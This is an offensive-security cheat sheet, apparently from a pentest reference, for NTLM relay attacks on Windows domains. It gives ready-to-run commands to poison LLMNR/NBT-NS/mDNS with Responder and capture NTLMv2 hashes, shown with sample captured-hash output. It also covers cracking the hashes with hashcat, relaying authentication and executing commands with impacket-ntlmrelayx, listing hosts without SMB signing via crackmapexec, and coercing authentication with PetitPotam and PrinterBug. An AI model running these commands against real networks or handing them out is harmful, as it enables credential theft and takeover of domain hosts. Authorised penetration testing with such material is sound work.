NTLM Relay & Responder
Capture hashes with Responder
Poison LLMNR/NBT-NS/mDNS — Capture NTLMv2 hashes on the network
sudo responder -I eth0 -dwPv
Example Output
[SMB] NTLMv2-SSP Client : 10.10.10.50
[SMB] NTLMv2-SSP Username : DOMAIN\jsmith
[SMB] NTLMv2-SSP Hash : jsmith::DOMAIN:1122334455667788:ABC123...
Crack captured NTLMv2 hashes
Hashcat mode 5600
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
NTLM relay with ntlmrelayx
Relay captured auth to another host — Don't crack, relay instead
# Disable SMB and HTTP in /etc/responder/Responder.conf
# SMB = Off, HTTP = Off
impacket-ntlmrelayx -tf targets.txt -smb2support
# Or execute command:
impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"
Find hosts without SMB signing
Required for relay attacks — These are valid relay targets
crackmapexec smb $SUBNET/24 --gen-relay-list relay_targets.txt
# "Message signing enabled but not required" = relay target
Force authentication (coercion)
Trigger authentication to your Responder
# PetitPotam (unauthenticated):
python3 PetitPotam.py $LHOST $DC_IP
# PrinterBug / SpoolSample:
python3 printerbug.py domain/user:password@$TARGET $LHOST